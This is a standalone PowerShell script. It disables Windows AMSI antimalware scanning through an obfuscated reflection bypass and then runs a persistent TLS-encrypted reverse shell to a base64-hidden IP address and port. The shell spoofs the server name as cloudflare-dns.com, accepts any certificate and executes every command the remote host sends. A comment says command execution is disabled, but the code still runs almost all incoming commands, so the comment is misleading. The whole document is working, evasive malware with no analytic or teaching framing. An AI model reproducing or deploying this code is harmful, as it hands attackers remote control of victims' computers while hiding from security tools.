$P6YRK8Et09QIK=$null;$kjf=[System.Runtime.InteropServices.Marshal]::AllocHGlobal((9076+8631-8631));$amrzwqlqoeubknpmmwzpd="+[ChaR](119*100/100)+[cHAr]([ByTE]0x68)+[cHAR]([ByTE]0x63)+[ChaR]([BYtE]0x70)+[Char]([BYtE]0x71)+[char](117)+[Char]([bYtE]0x75)";[Threading.Thread]::Sleep(256);[Ref].Assembly.GetType("System.$([ChaR](77+2-2)+[chAr](97)+[cHar](110)+[cHAR]([Byte]0x61)+[cHaR](103)+[CHAr](101+78-78)+[CHAR](109*79/79)+[Char](101*8/8)+[Char]([bYTe]0x6e)+[chaR](116)).$([chAr]([BYTE]0x41)+[chAr](20+97)+[cHar](116*19/19)+[cHAR]([bYTE]0x6f)+[CHaR]([bYte]0x6d)+[CHAr](97*63/63)+[Char](116*52/52)+[ChAr](105)+[ChAR](111+21-21)+[chaR]([byTE]0x6e)).$(('Äms'+'îÙt'+'îls').nORmAliZe([ChAR]([byte]0x46)+[cHAr]([BYTE]0x6f)+[ChAr](114*22/22)+[cHar](109)+[chaR]([BYtE]0x44)) -replace [ChaR](92+63-63)+[CHAR](105+7)+[chaR](123+27-27)+[cHar](77+56-56)+[cHar]([byTe]0x6e)+[cHaR]([bYte]0x7d))").GetField("$(('àmsîSés'+'sìôn').nOrmAlIZe([chaR]([BYTe]0x46)+[ChAR](111+6-6)+[cHAr](87+27)+[chaR]([byTE]0x6d)+[cHAr](27+41)) -replace [CHAr](24+68)+[CHAR]([ByTE]0x70)+[ChAr]([byte]0x7b)+[ChAR](77+51-51)+[cHaR](110+40-40)+[CHar](125+119-119))", "NonPublic,Static").SetValue($P6YRK8Et09QIK, $P6YRK8Et09QIK);[Ref].Assembly.GetType("System.$([ChaR](77+2-2)+[chAr](97)+[cHar](110)+[cHAR]([Byte]0x61)+[cHaR](103)+[CHAr](101+78-78)+[CHAR](109*79/79)+[Char](101*8/8)+[Char]([bYTe]0x6e)+[chaR](116)).$([chAr]([BYTE]0x41)+[chAr](20+97)+[cHar](116*19/19)+[cHAR]([bYTE]0x6f)+[CHaR]([bYte]0x6d)+[CHAr](97*63/63)+[Char](116*52/52)+[ChAr](105)+[ChAR](111+21-21)+[chaR]([byTE]0x6e)).$(('Äms'+'îÙt'+'îls').nORmAliZe([ChAR]([byte]0x46)+[cHAr]([BYTE]0x6f)+[ChAr](114*22/22)+[cHar](109)+[chaR]([BYtE]0x44)) -replace [ChaR](92+63-63)+[CHAR](105+7)+[chaR](123+27-27)+[cHar](77+56-56)+[cHar]([byTe]0x6e)+[cHaR]([bYte]0x7d))").GetField("$([chAR](97+62-62)+[cHAr](109+83-83)+[ChaR]([bYte]0x73)+[cHar](105*70/70)+[cHAR]([byTE]0x43)+[cHAr](111)+[cHaR](110+32-32)+[ChAr](116)+[CHAr]([byTE]0x65)+[Char]([BYTE]0x78)+[CHaR](116+91-91))", "NonPublic,Static").SetValue($P6YRK8Et09QIK, [IntPtr]$kjf);$iyjxtzplxhmwrjvaq="+('wjzzpôbãrìäv'+'tä').nORmAlIze([cHar]([BYtE]0x46)+[Char]([byTE]0x6f)+[chAR](114+90-90)+[chAR]([BYTE]0x6d)+[ChAr](68+41-41)) -replace [ChAR]([BYTE]0x5c)+[CHar]([bYtE]0x70)+[chaR]([byTe]0x7b)+[CHAr]([BYtE]0x4d)+[cHar]([Byte]0x6e)+[cHar](125+43-43)";[Threading.Thread]::Sleep(32)
function Decode-Base64String($b){[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($b))}
$WjfIwJ4204206969=Decode-Base64String "NzguNTQuMS4xNjQ="
$WurstSandwich420=[int](Decode-Base64String "ODA4MA==")
$sslProto=[System.Security.Authentication.SslProtocols]::Tls12

function Write-Stream($sw,$txt){$sw.Write($txt + 'SHELL> ');$sw.Flush()}

while($true){
    try{
        $cli=New-Object Net.Sockets.TCPClient
        $cli.Connect($WjfIwJ4204206969,$WurstSandwich420)
        $netStream=$cli.GetStream()
        $ssl=New-Object Net.Security.SslStream($netStream,$false,({$true} -as [Net.Security.RemoteCertificateValidationCallback]))
        $ssl.AuthenticateAsClient('cloudflare-dns.com',$null,$sslProto,$false)
        if(-not ($ssl.IsEncrypted -and $ssl.IsSigned)){ $ssl.Close();$cli.Close();Start-Sleep 5;continue }

        $sw=New-Object IO.StreamWriter($ssl)
        $sw.AutoFlush=$true
        Write-Stream $sw ''

        $buf=New-Object Byte[] 4096
        while($true){
            try{
                $r=$ssl.Read($buf,0,$buf.Length)
                if($r -le 0){throw "x"}
                $cmd=([Text.Encoding]::UTF8).GetString($buf,0,$r).Trim()
                if([string]::IsNullOrEmpty($cmd)){Write-Stream $sw '';continue}

                # Schutz vor direktem IEX mit whitelist (kein automatisches Ausführen)
                if($cmd -match '^\s*iex\s+'){
                    $out="Invoke-Expression ist deaktiviert."
                } else {
                    try{$out=Invoke-Expression $cmd 2>&1 | Out-String}catch{$out=$_.Exception.Message}
                }
                Write-Stream $sw $out
            }catch{break}
        }

        $sw.Close()
        $ssl.Close()
        $netStream.Close()
        $cli.Close()
    }catch{}
    Start-Sleep 5
}

